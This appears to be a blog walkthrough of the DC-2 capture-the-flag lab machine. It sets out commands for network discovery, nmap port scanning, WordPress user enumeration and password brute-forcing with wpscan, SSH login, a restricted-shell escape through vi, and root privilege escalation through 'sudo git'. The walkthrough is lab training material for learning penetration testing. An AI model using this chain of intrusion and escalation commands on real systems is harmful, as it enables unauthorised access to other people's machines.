BUG REPORT

 

BUG REPORT

. # = means commands

. 1-6 = show my steps

1 netdiscover.

# netdiscover -r [192.168.159.133]

. netdiscover = find network traffic ips and mac address.

. -r = range: scan a given range instead of auto scan. 192.168.6.0/24,/16,/8




2 nmap

# nmap -p- [192.168.159.133] -sV

. -p- = bydefault all ports scan tcp ex: 65535

. -sV = Probe open ports to determine service/version info






3 wpscan.

# wpscan --url http://dc-2/ -e

. --url = target url scan

. -e = enumerate ex: username.








#wpscan --url http://dc-2/ -U /home/kali/usr -P /home/kali/pass.txt

. -U = usernames LIST

. -P password LIST






3 aceess.

# ssh tom@192.168.159.133 -p 7744

. access the tom users on port 7744.







4 change shell for this machine for the root access

# vi flag3.txt and :set shell=/bin/bash after that call the shell

5 To run all linux commands LIKE:- cat , cd , su , sudo etc.

# export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH

. export = this command add use for add variables.





4 how many command run with sudo check.

# sudo -l




5 how to access root.

# sudo git -p help config

. This invokes the default pager, which is likely to be less, other functions may apply.






6 after that you are access the final flag and your work complete.














Comments

Popular posts from this blog

sql misconfiguration and privesc with path vulnerbility